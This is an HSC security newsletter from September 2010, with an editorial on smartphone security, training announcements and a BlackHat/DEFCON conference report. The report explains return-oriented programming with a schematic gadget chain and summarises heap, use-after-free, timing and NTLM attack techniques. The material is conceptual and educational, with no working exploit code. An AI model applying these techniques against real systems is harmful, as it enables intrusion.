[Newsletter HSC] N°73 - Septembre 2010
Newsletter d'information de HSC
newsletter at hsc-news.com
Lun 6 Sep 12:11:48 CEST 2010
========================================================================
HSC Newsletter -- N°073 -- septembre 2010
========================================================================
« Les patrons sont comme les chats dans une litière. Instinctivement ils
remuent tout pour cacher ce qu'ils ont fait. »
[ Scott Adams, Le Principe de Dilbert ]
--[ Sommaire ]----------------------------------------------------------
1. Editorial
2. Le saviez vous ? La question
3. Consultants certifiés
4. HSC accrédité par EXIN
5. Nouvelle formation : Correspondant Informatique et Libertés
6. Compte-rendu des conférences BlackHat et DEFCON
7. Programme de la 4ième conférence "SMSI et normes ISO 27001"
8. Offre d'emploi : consultants sécurité organisationnels
9. Agenda des interventions publiques
10. Prochaines formations HSC
11. Actualité des associations : Club 27001 et OSSIR
12. Le saviez vous ? La réponse
--[ 1. Editorial - Hervé Schauer ]--------------------------------------
Enfin les ordiphones à l'honneur de l'insécurité grandissante de
notre société dépendante et de nos infrastructures fragiles. Ordiphone
est le mot français pour les ordinateurs-téléphones ou smartphones, PDA,
assistants personnels, etc. Depuis déjà bien longtemps l'ordiphone est un
vecteur de fuite d'information et d'intrusion dans les réseaux et
applications des entreprises. Petit et facile à perdre, parfois peu protégé,
rarement avec des données chiffrées, il est encore largement oublié des
mises en oeuvres des politiques de sécurité. Si quelques grands comptes
se sont posés la question il y a déjà 5 ans, c'est en 2010 que les
prestations d'étude et d'audits sur ces appareils décollent. Il était temps.
Comme toujours, il aura fallu attendre des incidents significatifs.
Ainsi cet été, enfin un virus sur Iphone trouvé chez un client, à suivre.
Mais comment faire quand ces ordiphones ont explosé, non pas parce que
chacun a reçu son Blackberry de son employeur, mais parce que chacun a
acquis un Iphone pour surfer tranquille ? Sans le dispositif d'interdiction
d'accès à Facebook par la connexion internet de l'entreprise ?
Un Blackberry ou un Windows Mobile de flotte d'entreprise permet justement
de déployer une telle politique d'interdiction. Beurk. Heureusement que nos
Iphone ou Android sont personnels, cumulent données personnelles et
professionnelles, et ne respectent aucune politique de sécurité imposée
par l'entreprise... Les réponses de certains au courrier électronique
sont plus rapides sur gmail que sur la messagerie de leur employeur, parce
que de plus en plus d'utilisateurs répondent collés à leur ordiphone
personnel à leur messagerie gmail, et ne vont que de temps en temps voir
leur messagerie d'entreprise.
Toute la politique de sécurité déployée depuis des années est
totalement contournée par ces ordiphones, voilà à quoi nous ont
amené ces interdictions liées à une politique de gestion du personnel,
sans le moindre rapport avec la SSI, mais qui prétendument sous couvert
de sécurité n'ont fait que contribuer à la mauvaise image de la SSI.
La majorité des ordiphones est encore peu adaptée à une gestion de
flotte et un usage intégré au SI de l'entreprise. Malgré cela, il n'y
a pas d'autre issue que de déployer sa politique de sécurité sur tous
les ordiphones qui contiennent des données professionnelles, y compris
ceux qui n'ont pas été fournis par l'employeur mais achetés
personnellement.
Pour en savoir plus : MISC n°51 de septembre 2010 avec un dossier
complet sur la sécurité des OS mobiles.
PS: J'utilise un Nokia N900 sous Maemo (Linux Debian).
--[ 2. Le saviez vous ? La question ]-----------------------------------
Connaissez vous un moyen de charger et d'instancier une classe Java
distante non incluse dans le classpath du programme en cours d'exécution ?
Réponse au paragraphe 12.
--[ 3. Consultants certifiés ]------------------------------------------
Nicolas Collignon, Alexandre Fernandez-Toro et Yves Le Provost ont
passé avec succès l'examen QSA (Qualified Security Assessors) vendu par
le PCI Council : https://www.pcisecuritystandards.org/pdfs/pci_qsa_list.pdf
Ils seront donc officiellement à même de mener des audits de certification
PCI-DSS des organisations qui manipulent des données issues des cartes
bancaires. L'envoi de ces trois consultants à la formation et l'examen QSA
démontre l'engagement d'HSC afin de devenir certificateur des entreprises
désirant être certifiées PCI-DSS.
Alexandre Fernandez-Toro et Yves Le Provost animeront en 2011 la formation
HSC sur les essentiels de PCI-DSS.
Pour en savoir plus :
Notre formation l'essenciel de PCI-DSS :
http://www.hsc-formation.fr/formations/essentiel_pcidss.html.fr
Nos prestations PCI-DSS : : http://www.hsc.fr/services/pcidss.html.fr
--[ 4. HSC accrédité par EXIN ]-----------------------------------------
Nouvelle formation et certification en sécurité proposée par HSC
HSC a été accrédité par EXIN pour pouvoir délivrer la formation à la
sécurité "ISF" et permettre à ses stagiaires de passer l'examen dans ses
locaux.
La formation ISF : "Information Security Foundations based on ISO/IEC 27002"
donne les bases en sécurité des systèmes d'information. Elle est accessible
à tout public, et notamment à tous les responsables et tous les informaticiens
qui n'ont aucune connaissance en sécurité des systèmes d'information. Elle
s'adresse à tous ceux souhaitant connaître les bases de la SSI, les concepts
fondamentaux, et pouvoir afficher cette connaissance par une certification
reconnue.
La certification "Information Security Foundations based on ISO/IEC 27002"
conçue par EXIN, est basée sur le référentiel téléchargeable en ligne sur
le web d'EXIN :
http://www.exin.org/Exams/Exam%20program/ISO%20IEC%2027000/~/media/Documents/ISFS%20book%20%20%20English%20%20%20Final%20incl%20index%20pdf.ashx
EXIN est pionnier et n°1 mondial des certifications de compétences dans
la production informatique, reconnu pour sa certification "ITIL Foundations".
EXIN a étendu son offre de certification en délivrant cette première
certification en sécurité.
HSC propose une formation aux "Fondamentaux techniques de la SSI",
http://www.hsc-formation.fr/formations/fondamentauxSSI.html.fr
et les formations certifiantes ISO 27001 Lead Auditor et Implementer
avec la certification LSTI. Cette nouvelle formation se place en amont
de celles-ci et complète l'offre de formation et l'offre de certification
d'HSC.
La formation dure deux jours, examen de certification compris. La
prochaine session sera animée par Hervé Schauer les 21 et 22 septembre 2010
à Paris.
Objectifs, pré-requis, méthode pédagogique, et plan détaillé disponibles sur :
http://www.hsc-formation.fr/formations/isf.html.fr
--[ 5. Nouvelle formation : Correspondant Informatique et Libertés ]----
Le poste de CIL, Correspondant Informatique et Libertés, est
désormais une fonction clé au sein des entreprises, qu'il soit ou pas
déclaré en tant que CIL à la CNIL. C'est une fonction à la fois juridique
et informatique de plus en plus sensible, au coeur de la gouvernance
d'entreprise qui impose un haut niveau d'expertise.
La "Formation CIL" conçue par HSC a pour objectif de donner aux personnes
exerçant ou devant exercer les fonctions de Correspondant Informatique et
Libertés (CIL) les connaissances indispensables à l'accomplissement de leurs
missions. La formation est conçue par Frédéric Connes, docteur en droit,
également ingénieur en informatique et spécialisé en sécurité des systèmes
et réseaux, avec la contribution de l'équipe des consultants en sécurité
d'HSC.
La Formation CIL apporte aux stagiaires l'ensemble des éléments juridiques
dont ils auront besoin pour mener à bien leurs missions, par une approche
se voulant résolument pratique et proche des problèmes concrets auxquels
un CIL est confronté quotidiennement. La formation traite notamment des
notions indispensables de sécurité de l'information.
Le cours alterne les phases d'exposé magistral et d'exercices pratiques
invitant les participants à se mettre en situation et à réfléchir aux
possibilités de réponses juridiques et techniques aux problèmes concrets
qui leur sont posés.
Durée : 2 jours.
Formateur : Frédéric Connes, docteur en droit et ingénieur en informatique
Prochaines sessions :
- Paris : 21 et 22 octobre 2010
- Bordeaux : 25 et 26 novembre 2010
Des sessions sont planifiées à Clermont-Ferrand, Lille, Limoges, Lyon,
Montpellier, Nantes, Nice, Poitiers, Rennes, Toulouse, etc.
Vous souhaitez une session de formation inter-entreprise au CIL dans votre
ville ? Contactez Hervé Schauer.
Objectifs, Pré-Requis, méthode pédagogique, plan détaillé et dates des
formations en province disponibles sur :
http://www.hsc-formation.fr/formations/cil.html.fr
Pour tout renseignement et pour vous inscrire contactez Lynda Benchikh
formations at hsc.fr -- +33 141 409 704
--[ 6. Compte-rendu des conférences BlackHat et DEFCON ]----------------
Jean-Baptiste Aviat et Yves Le Provost
Cette année, les différentes conférences données à Las Vegas, dans le
cadre de la réunion annuelle de Black Hat USA, ont fait la part belle à deux
grands sujets. Le premier, dont la genèse provient d'un buzz courant sur
Internet depuis quelques semaines était lié à une soi-disante nouvelle
faille dans la sécurité des réseaux Wi-Fi, permettant, selon les ouï-dire
de casser la sécurité du protocole WPA. Le buzz s'est aussitôt dégonflé,
comme ont pu le relater nombreux sites et blogs, au vu de la performance
réelle de l'attaque (qui pourrait se réduire à une simple attaque de type
Man-in-the-Middle).
L'autre grand sujet de cette édition de BlackHat, n'est pas dû au buzz, mais
plutôt aux nombreuses conférences traitant du sujet des "ROP" : Return
oriented Programming. Cette technique n'est pas nouvelle, mais les
conférences s'attardaient sur certaines méthodes d'optimisation.
Un dernier sujet récurrent mais bien moins technique concerne les réseaux
sociaux.
Le ROP, Return Oriented Programming, est une technique relativement
récente d'exploitation de buffers overflows. Aujourd'hui, les techniques
de protection consistent par exemple à utiliser des zones mémoires non
exécutables (DEP, bit NX), à rendre aléatoires les adresses de base des
bibliothèques, ou à inclure des octets à 0 dans les adresses des fonctions
sensibles (par exemple, system(), exec()...).
Le ROP permet de s'affranchir en partie de ces protections, en étant capable
d'exploiter la moindre bibliothèque non aléatoire, même si elle ne dispose
pas de fonction intéressant l'attaquant, et en n'exécutant que du code situé
en zone exécutable.
Cette technique consiste en fait à choisir des opcodes intéressants en
mémoire suivis de l'instruction 'RET'. Si un attaquant souhaite exécuter
les opcodes :
A
B
C
Il cherchera dans une bibliothèque (à l'adresse de base fixe) chargée en
mémoire, les instructions suivantes :
gadget 1 : 0x080480f0 A
0x080480f2 RET
gadget 2 : 0x080482f0 B
0x080482f2 RET
gadget 3 : 0x080485e0 C
0x080485e2 RET
Une suite d'instructions en mémoire suivie d'un RET s'appelle un "gadget".
Il suffit ensuite d'écraser EIP avec l'adresse du gadget 1, puis de la faire
suivre par l'adresse des autres gadgets :
pile d'origine : pile écrasée :
Saved EIP 0x080480f0 (@ gadget 1)
... 0x080482f0 (@ gadget 2)
... 0x080485e0 (@ gadget 3)
Comme RET est équivalent à 'POP EIP', il suffit d'écraser EIP avec l'adresse
du premier gadget pour que l'instruction RET de ce premier gadget charge EIP
avec l'adresse du gadget suivant, et ainsi de suite.
Une des difficultés du ROP est l'assemblage des gadgets pour exécuter du code
intéressant l'attaquant.
"Payload Already Inside: Data Re-Use for ROP exploits"
Long Le - VNSecurity
======================================================
La nouveauté est ici un outil développé pour rendre toutes ces constructions
beaucoup plus aisées. L'outil, ROPEME pour Return Oriented Exploit
Made Easy, permet d'automatiser la recherche de Gadgets dans les binaires
(en créant un catalogue des différents gadgets), et de générer les étapes
0 et 1.
La présentation est conclue avec la démonstration d'une exploitation sur une
vulnérabilité de la bibliothèque TIFF (CVE-2010-2067) permettant une
élévation de privilège.
"Return-Oriented Exploitation"
Dino Dai Zavi
==============================
L'orateur présente ici une méthode pour utiliser le ROP lorsque le buffer
contrôlé est dans le tas. Il suffit d'utiliser les instructions suivantes :
XCHG EAX, ESP
RET
pour que la pile utilise les adresses du tas (sous réserve d'une valeur
cohérente pour EAX). A l'aide d'un outil maison de construction de payloads,
une démonstration d'exploitation de MS10-002 a été effectuée sur une machine
disposant du DEP.
"Everybody be cool this is a roppery !"
Tim Kornau, Vincenzo Iozzo, Ralf-Philipp Weinmann
=================================================
L'équipe de Zynamics a présenté ici une méthode extrêmement élaborée de
construction de payloads ROP sur des architectures ARM : iPhone, Android, etc.
A l'aide du langage REIL (méta langage assembleur, présenté par exemple
en 2009 à CanSecWest), il est possible de déterminer si une suite
d'instructions est équivalente à une autre, et donc d'extraire d'un binaire
tous les gadgets utilisables.
La seconde part de leur travail a consisté à écrire un compilateur ("The
Wolf"), pouvant combiner automatiquement ces gadgets en quelque chose d'utile,
en utilisant notamment le logiciel libre "Simple Theorem Prover".
Cette méthode permet donc automatiquement de créer une charge utile ROP étant
donnée une bibliothèque chargée en mémoire.
Cette présentation conclut les conférences relatives au ROP.
"Aleatory Persistent Threat"
Nicolas Waisman
============================
Après avoir présenté la difficulté d'écrire des exploitations fiables pour
les débordements de tas, l'orateur a présenté son exploitation du bogue
Aurora.
Les exploitations précédentes utilisaient du heap sprays, et n'étaient
donc pas fiables, et potentiellement lentes. D'après lui, si les malwares se
font repérer, c'est à cause du crash des machines exploitées, et non grâce aux
logiciels de détection d'intrusion ou aux pots de miel. L'accent a donc été
mis lors de cette présentation sur la fiabilisation des exploits.
La technique consiste donc, pour une bogue de type "user after free", à
remplacer l'objet incriminé par un objet de même taille, mais disposant
d'une vtable différente. Il est ensuite possible de :
- choisir une méthode dont le nombre de paramètres modifiera l'alignement
de la pile pour nous offrir le contrôle d'EIP ;
- choisir une méthode faisant quelque chose d'utile ;
- choisir un autre objet permettant d'obtenir davantage d'offset de
fonctions après avoir déclenché un second "use after free".
"Exploiting timing attacks in widespread systems"
Nate Lawson
=================================================
La technique présentée ici est classique : attaquer les fonctions de
comparaison d'un mot de passe fourni au mot de passe de référence, la
vulnérabilité venant des fonctions retournant "tôt". L'application de cette
attaque est moins courante puisqu'elle concerne ici des systèmes Web
standards, présents par exemple sur Internet.
Leur configuration nécessite l'utilisation d'un client préparé très
minutieusement pour obtenir la mesure de temps la plus précise possible, en
désactivant l'"IRQ coalescing", et en implémentant une émission de requêtes
HTTP à l'aide des raw sockets, afin par exemple de scinder l'envoi de la
requête (en-têtes puis mot de passe).
Les implémentations effectuant les comparaisons sur le Base64 sont davantage
vulnérables que les autres, puisque pour une même chaîne, les comparaisons
sont plus longues.
Le plus fort taux de succès des orateurs réside dans les applications Java, qui
sont les plus lentes.
"Understanding the Windows SMB NTLM Weak Nonce Vulnerability."
Hernan Ochoa, Agustin Azubel
==============================================================
Cette conférence vise le protocole d'authentification NTLM, utilisé par
Microsoft. Après une revue des protocoles d'authentification utilisés par
SMB, une vulnérabilité dans les échanges et surtout dans le générateur
pseudo-aléatoire est présenté (MS10-012). De cette partie, il est déduit
qu'une bonne partie de la sécurité réside dans la non-prédiction des
challenges utilisés.
Ils montrent alors, via différentes études et graphes, que le challenge n'est
pas impossible à prédire.
Il en découle plusieurs exploitations possibles :
- attaque en rejeu : l'attaquant rejoue l'authentification jusqu'à ce que le
serveur renvoie un challenge déjà utilisé.
- la création d'une collection de challenges dupliqués : l'attaquant
collectionne les challenges envoyés par le serveur. Il piège ensuite
le client via une attaque de type phishing, pour lui envoyer les
challenges récupérés auprès du serveur afin d'en obtenir les
réponses. Cette technique permet de réduire le temps avant d'avoir
un rejeu de challenge de la part du serveur.
- la prédiction de challenge : ici, la technique est beaucoup plus élaborée
et utilise l'étude complète de la génération des nombres pseudos
aléatoires pour y trouver une faille et pouvoir prédire les futures
challenges.
Cette prédiction de challenge est la grande faille exposée dans cette
conférence. Elle a fait l'objet d'un retour auprès de Microsoft qui l'a
classée comme "importante" dans la catégorie "élévation de privilège", mais
les auteurs la considèrent comme "critique" et "exécution de code à distance".
La présentation prend fin sur une démonstration de la génération de challenge.
"Adventures in Limited User Post Exploitation."
Nathan Keltner, Tim Elrodi
===============================================
Le but de cette conférence était de casser le mythe qui consiste à croire que
la limitation des droits d'un utilisateur permet de sécuriser une machine.
Toute la présentation porte donc sur les attaques en élévation de privilège.
Elle n'apporte pas véritablement de nouveautés, la seule innovation vient d'une
nouvelle fonction qu'ils ont developpé pour Meterpreter et qui permet de
contrôler le cache d'Internet Explorer. Il est ainsi possible de provoquer un
empoisonnement de cache, de modifier l'affichage des sites, de capturer des
mots de passe, etc.
"Blue Screen of The Death is dead"
Matthieu Suiche
==================================
Après une présentation de l'intéret d'étudier la mémoire d'un système
d'exploitation, et avoir recensé les différentes techniques permettant de le
faire, Matthieu Suiche a présenté son dernier toolkit "MoonSols Windows Memory
Toolkit" pour la gestion des "full memory dumps" Windows, gérant les fichiers
d'hibernation, les dump "raw", et les crashdumps. Son outil offre la
possibilité de convertir les fichiers d'hibernation (toutes versions) et les
dump raw de la mémoire physique (l'équivalent de /dev/mem, soit
\Device\PhysicalMemory sous windows, ou les fichiers vmem de VMWare) en
Microsoft crash dump compatible avec Microsoft Windbg. Notons que la conversion
des fichiers vmem fonctionnent aussi avec des machines virtuelles vmware
"live/running".
"Getting In Bed With Robin Sage"
Thomas Ryan
================================
Une conférence qui avait pris soin d'être bien montée en buzz, tel que Black
Hat sait le faire régulièrement. En effet, le sujet de la conférence avait
déjà fait l'objet de plusieurs publications dans différents journaux. Il est
normal alors que la présentation ressemble plus à un show à l'américaine qu'à
une conférence classique.
En effet, Thomas Ryan commence sa présentation ... en laissant une femme,
alias Robin Sage, parler à sa place. Le but de son "étude", était de voir
jusqu'où pouvait aller la création d'une fausse identité sur les différents
réseaux sociaux. La méthode est relativement simple : une jolie femme,
intelligente, un CV conséquent, etc. et différentes demandes de mise en
relation avec des "personnalités". Un grand nombre a accepté, notamment des
personnes "reconnues", dans le monde de la sécurité informatique. Une fois
le tour de passe-passe effectué, le but a été de voir ce que pouvait
permettre ce genre de situation, notamment en terme de proposition d'emploi,
ou plus si affinité...
"There's a party at Ring0 (and you're invited)"
Julien Tinnes et Tavis Ormandy
===============================================
Cette présentation a déjà été effectuée à CanSecWest. Elle vise plus
particulièrement les vulnérabilités noyaux, et notamment celles découvertes
par ces deux employés de Google durant ces derniers mois, afin de pouvoir
élever ses privilèges depuis un utilisateur sans droit particulier. Ils
partent donc des différents points d'accroche qu'un utilisateur peut avoir
sur les noyaux Linux ou Windows pour y chercher des failles et tenter de les
exploiter. Des erreurs telles que le décodage en Ring0 des polices dans
Internet Explorer sont présentées. La suite de la conférence est donc
l'explication technique des failles découvertes, et ouvre de nouveaux
horizons sur des parties du noyau peu utilisées par les développeurs, et
qui sont donc susceptibles de contenir encore de nombreuses failles.
Par exemple, Windows dispose d'environ 1400 appels systèmes, alors que
Linux en possède moins de 400.
"Virt-ICE: next generation debugger for malware analysis"
Quynh Nguyen Anh et Kuniyasu Suzaki
=========================================================
La présentation de Virt-Ice était intéressante, notamment pour tous ceux qui
ont connu softice. Le sujet traite donc de débogage, mais en utilisant les
avantages de la virtualisation. Le but général est de pouvoir deboguer
n'importe quel programme, même ceux possédant des protection anti-debogage.
Le principe est de faire tourner un binaire (typiquement un logiciel
malveillant) au sein d'une machine virtuelle. Le débogueur étant placé
"sous" la machine virtuelle, il est complétement invisible depuis le
binaire étudié. Le deuxième avantage, est qu'il permet également de
travailler sur les rootkits.
La présentation débute en montrant les différentes solutions qu'ont les
logiciels malveillants contre les débogueurs, ceci pour démontrer toute
l'utilité de leur debogueur "virtualisé". Ils passent ensuite à la
présentation de leur outil. L'architecture est relativement simple : un
hôte héberge une machine virtuelle qui contiendra le binaire à analyser.
Un pilote spécifique placé dans le système de virtualisation permettra
d'interagir et d'intercepter les appels systèmes. Un client a été developpé
pour dialoguer avec ce pilote.
La présentation se poursuit ensuite en expliquant précisemment tous les
choix techniques qui ont du être faits pour mener à bien cette architecture
(choix de la machine virtuelle, de l'OS, etc.). Elle se termine par une
démonstration du client.
"Advanced AIX Heap Exploitation Methods"
Tim Shelton
========================================
Cette conférence rappelle tous les aspects de l'environnement AIX :
population, look, etc. Elle se caractérise également par le faible nombre
de personnes présentes dans la salle (15 personnes tout au plus), dont
la majorité semble être des proches de l'orateur. Preuve que AIX n'intéresse
plus grand monde ?
Après un rappel des découvertes de David Litchfield en 2005 sur l'exploitation
de heap overflow dans AIX 5.3 (fonctions free()/rightmost() : l'exploitation
était effectuée lors de l'utilisation de la fonction free() sur un espace
mémoire dans lequel il était possible d'effectuer un overflow). Il est partit
de cette présentation pour élargir l'exploitation de la vulnérabilité au
système AIX 6.1 dans des conditions différentes (exploitation suite à un
autre appel à la fonction malloc() après le premier malloc sur un espace
présentant une possibilité d'overflow : malloc()/ /leftmost()). La suite
permet de montrer les détails techniques de ces découvertes et se termine
par une démonstration d'exploitation.
La conférence Defcon, qui donne toujours lieu à diverses "contest" et
conférences se tenait du 30 Juillet au 1 août. Certaines conférences se sont
montrées très intéressantes, dont certaines avaient déjà été données à
BlackHat, et d'autres, beaucoup plus légères, présentaient moins d'intérêts.
"App attack - surviving the mobile application explosion"
Kevin Mahaffey et John Hering
=========================================================
Le principal intérêt de cette conférence qui visait les applications fournies
sur l'Apple Store ou Google Market, était d'avoir un aperçu sur les
fonctionnalités contenues dans ces applications. Pour cela, ils ont créé un
outil qui permet d'automatiquement aller rechercher des applications et
d'étudier leurs comportements. Le but étant notamment d'établir des
statistiques pour vérifier que certaines applications ne font pas de choses
différentes de leur but annoncé. Il en résulte que beaucoup d'applications en
font justement trop : 14 % des applications lisent illégitimement les contacts
sur iPhone, 8% sur Android, 33% accèdent à la géolocalisation sur iPhone, 30%
sur Android. Les orateurs prennent également pour exemple une application
censée télécharger et installer des fonds d'écran, qui envoyait, au moment du
téléchargement, des informations comme l'IMEI ou le numéro de téléphone...
"This is not the droid you're looking for"
J.Percoco et Christian Papathanasiou
==========================================
Après avoir rappelé que le système d'exploitation Android utilisait un noyau
Linux, les orateurs ont démontré que, comme sur tout noyau Linux, il était
possible d'installer des rootkits et ainsi prendre le contrôle total du
téléphone.
Le CTF - Capture The Flag - cette année s'est malheureusement caractérisé par
d'énormes problèmes d'administration : binaires buggés, clés inaccessibles,
classement tardif et inexact, etc. Certaines équipes en ont profité pour
modifier leur propre clé, empéchant ainsi les autres de marquer des points, ce
qui n'a visiblement pas choqué les organisateurs... Quoiqu'il en soit,
l'équipe Française, alias les Routards, a fait une nouvelle fois honneur
à sa réputation en finissant deuxième au classement pour la troisième
fois consécutive. Si le "Saint-Grall" n'a pu être décroché, il en résulte
que cette équipe est la plus constante de ces dernières années. En espérant
que l'édition 2011 bénéficie d'une organisation plus rigoureuse, et que le
drapeau passe enfin aux couleurs tricolores.
--[ 7. Programme de la 4ième conférence "SMSI et normes ISO 27001" ]----
Le Club 27001 (http://www.club-27001.fr/) organise sa quatrième
conférence annuelle sur l'ensemble de la série des normes ISO 27001
le mardi 30 novembre 2010 à Paris (Espace Saint-Martin) dans le cadre
des GS-DAYS. Voici le programme provisoire :
8h30 : Accueil (petit déjeuner)
9h00 : "Etat des lieu des normes"
. Intervenant en cours de confirmation du GCSSI d'AFNOR Normalisation
9H30 : "Retour d'expérience : Mise en oeuvre et certification ISO 27001"
. Stéphane Sciacco, support d'expertise implémentation ISO 27001,
Orange Business Services
. Eric Wiatrowski, directeur sécurité, Orange Business Services
10h15 : Pause
10h45 : "Appréciation conjointe ISO 27001 et ISO 20000-1"
. Cesare Gallotti, consultant et auditeur de certification
ISO 20000-1 et ISO 27001, Milan, Italie (conférence en français)
11h30 : Table-ronde sur la gestion des risques et l'ISO 27005
. Intervenants en cours de confirmation
12h15 : Repas (buffet déjeunatoire)
14h00 : "Retour d'expérience en cours de confirmation"
14h45 : "Un SMSI dans une collectivité territoriale : enjeux et actions"
. Nicolas Bunoust, RSSI & CIL, Conseil Général de Loire-Atlantique
15h30 : Pause
16h00 : "Retour d'expérience : mise en oeuvre et certification ISO 27001"
. Xavier Beulé, chef de projet ISO 27001, Bull
16h45 : "Retour d'expérience : certification ISO 27001 d'un opérateur de jeux"
. Benoit Bécart, responsable du SMSI, Betclic
. Moussa Diallo, MOE sécurité, Betclic
17h30 : Table-ronde : maintien de sa certification dans la durée
. Intervenants en cours de confirmation
18h00 : Fin
Inscription à la conférence : 290 euros pour les adhérents au Club 27001,
590 euros pour les non-adhérents.
Rappel : l'adhésion au Club 27001 n'est que de :
- pour un particulier : 27 euros,
- pour une entreprise : 270 euros (donnant droit à 5 entrées à la
conférence au prix remisé), soit une économie jusqu'à 1500 euros
Le Club 27001 n'est pas soumis à la TVA.
Lieu : http://www.espacesaintmartin.com/paris/html/plan.html
Contact : conference at club-27001.fr
Programme complet et bulletin d'inscription seront publiés prochainement
sur le site du Club 27001 : http://www.club-27001.fr/
--[ 8. Offre d'emploi ]-------------------------------------------------
HSC recrute des stagiaires et des consultants organisationnels en
sécurité des systèmes d'information, afin :
- D'accompagner ses clients dans leur démarche de gouvernance de la
SSI (SMSI/ISO27001)
- D'accompagner ses clients dans la gestion des risques de sécurité de
l'information
- Plus généralement, de participer aux projets utilisant les normes
de la série ISO27K pour répondre aux attentes de ses clients.
Les qualités recherchées sont les suivantes :
- Discrétion et capacité à travailler sur des projets sensibles, des
infrastructures vitales, etc
- Compréhension du modèle économique de l'activité d'expertise
- Maîtrise de l'informatique et des technologies de l'information
- Bonne qualité de rédaction en français
- Bon contact humain
Les qualités suivantes seront un plus apprécié :
- Connaissance des notions de système d'information et sa sécurisation
- Compréhension des enjeux du pilotage de la SSI par les risques
- Maîtrise de l'état d'esprit pour la fourniture de service à valeurs
ajoutées
- Adaptabilité au contexte d'un client
- Autonomie
- Bonne expression à l'oral
Les ingénieurs sélectionnés pourront être formés à la sécurité et sur les
normes ISO 27001 et ISO 27005 par HSC, soit en tout 2 à 6 semaines de
formations.
Les postes sont basés à Levallois-Perret (Paris), à 5 minutes de la gare
Saint-Lazare.
Si vous souhaitez proposer votre candidature, nous vous remercions d'envoyer
votre CV en texte ascii par courrier électronique à cv at hsc.fr.
--[ 9. Agenda des interventions publiques ]-----------------------------
- 14 septembre 2010 - OSSIR - Paris
"Compte-rendu des conférences Blackhat & Defcon Las Vegas"
Jean-Baptiste Aviat et Yves Le Provost
http://www.ossir.org/
- 17 septembre 2010 - Conference Netfocus 2010 - Paris
"Developpements sécurisés ?" - Nicolas Collignon
- 24 septembre 2010 - Conférence inaugurale Clusir Tahiti - Papeete
"Risque, méthodologie, gouvernance et normes ISO 27000"
Alexandre Fernandez-Toro
- 12 octobre 2010 - Journée Techniques Réseaux - Lyon
"La Sécurité ToIP/VoIP" - Jean-Baptiste Aviat
https://listes.cru.fr/wiki/jtr.prog.2010/public/programme
- 20 octobre 2010 - Journées RSSI - Paris
"Les webshells ou comment ouvrir les portes de son réseau ?" - Renaud
Dubourguais
- 23 novembre 2010 - C&ESAR journées SSI du CELAR - Rennes
"Perspective des doctrines françaises en matière de cyberdéfense" -
Emeric Laroche et Raphaël Marichez
http://www.rennes.supelec.fr/JSSI/
- 30 novembre 2010 - Conférence annuelle du Club 27001 - Paris
Animation de la journée - Hervé Schauer
- 2 décembre 2010 - Conférence "Actualité du droit des systèmes
d'information" - Paris
"Comment sécuriser juridiquement ses données hébergées dans les
nuages ?" - Frédéric Connes
http://www.comundi.fr/conference/120481/actualite-du-droit-des-systemes-d-information-anticiper-les-risques-juridiques-a-venir-et-s-en-premunir.html
- 9 février 2011 - Information Security Day - Luxembourg
"From spontaneous infrastructures to cloud computing security failure"
invited keynote speach - Hervé Schauer
Retrouvez l'agenda de nos interventions publiques sur
http://www.hsc.fr/conferences/agenda.html.fr
--[ 10. Prochaines formations HSC ]-------------------------------------
Nos prochaines formations sont les suivantes :
- Paris
ISO 27001 Lead Implementer .......... : 6 au 10 septembre (#) (C)
ISO 2000-1 Lead Auditor ............. : 13 au 17 septembre (#)
ISO 27001 Lead Auditor .............. : 13 au 17 septembre (#)(C)
Information Security Foundations .... : 21 et 22 septembre (#)
Fondamentaux techniques de la SSI ... : 23 et 24 septembre
Essentiel de la série ISO27001 ...... : 23 et 24 septembre
Gestion des identités et des accès .. : 27 au 29 septembre
Sécurité des serveurs et applications web : 27 au 29 septembre (*)
Indicateurs & tableaux de bord SSI/ISO27004 : 30 septembre
Sécurité du WiFi ..................... : 30 sept. et 1er oct. (*)
Mutualisation ISO 27001/autres référentiels : 1er octobre
Réalisation pratique des Tests d'Intrusion : 4 au 8 octobre (*)
ISO 27001 Lead Implementer .......... : 4 au 8 octobre (#) (C)
Formation RSSI ...................... : 11 au 15 octobre
ISO 27005 Risk Manager .............. : 18 au 20 octobre (#)
Essentiel de PCI-DSS ................ : 21 octobre
Correspondant Informatique et Libertés . : 22 et 23 octobre
ISO 27001 Lead Auditor .............. : 25 au 29 octobre (#)
Sécurité Windows .................... : 25 et 26 octobre (*)
Sécurité Unix et Linux .............. : 27 et 28 octobre (*)
Programmation sécurisée en PHP ...... : 3 au 5 novembre (*)
ISO 27005 Risk Manager .............. : 8 au 10 novembre (#)
ISO 27001 Lead Implementer .......... : 15 au 19 novembre (#)
Réalisation pratique des Tests d'Intrusion : 22 au 26 novembre (*)
Juridique de la SSI ................. : 29 et 30 novembre
Mesures de sécurité ISO 27002 ........ : 20 et 21 décembre
Sécurité du Cloud Computing ......... : 10 au 12 janvier 2011
Sécurité de la VoIP .................. : 18 février 2011
(*) : formations avec travaux pratiques avec un ordinateur par stagiaire
(#) : formations certifiantes
(C) : session de formation complète
- Luxembourg
ISO 27005 Risk Manager .............. : 20 au 22 septembre (#)
ISO 27001 Lead Implementer .......... : premier semestre 2011 (#)
- Bordeaux
Correspondant Informatique et Libertés . : 25 et 26 novembre
- Clermont-Ferrand
Correspondant Informatique et Libertés . : 8 et 9 décembre 2011
- Lille
Correspondant Informatique et Libertés . : 14 et 15 avril 2011
- Limoges
Correspondant Informatique et Libertés . : 17 et 18 octobre 2011
- Lyon
Correspondant Informatique et Libertés . : 7 et 8 avril 2011
ISO 27001 Lead Implementer .......... : 6 au 10 juin 2011 (#)
- Montpellier
Correspondant Informatique et Libertés . : 10 et 11 février 2011
ISO 27005 Risk Manager ............... : 14 au 16 mars 2011 (#)
ISO 27001 Lead Auditor .............. : 23 au 27 mai 2011 (#)
- Nantes
ISO 27005 Risk Manager .............. : 11 au 13 octobre (#)
Correspondant Informatique et Libertés . : 10 et 11 octobre 2011
- Nice
Correspondant Informatique et Libertés . : 10 au 11 mars 2011
- Poitiers
Correspondant Informatique et Libertés . : 17 et 18 novembre 2011
- Strasbourg
ISO 27005 Risk Manager .............. : 22 au 24 novembre (#)
Correspondant Informatique et Libertés . : 14 et 15 février 2011
- Toulouse
ISO 27001 Lead Implementer .......... : 21 au 25 mars 2011 (#)
ISO 27005 Risk Manager .............. : 9 au 11 mai 2011 (#)
Correspondant Informatique et Libertés . : 3 et 4 octobre 2011
(#) : formations certifiantes
Pour tout renseignement, et pour vous inscrire pour toutes les villes
sauf Luxembourg, contactez Lynda Benchikh :
formations at hsc.fr -- +33 141 409 704
Pour les formations à Luxembourg contactez Sylvie Favaut de Dimension Data :
Sylvie.Favaut at eu.didata.com
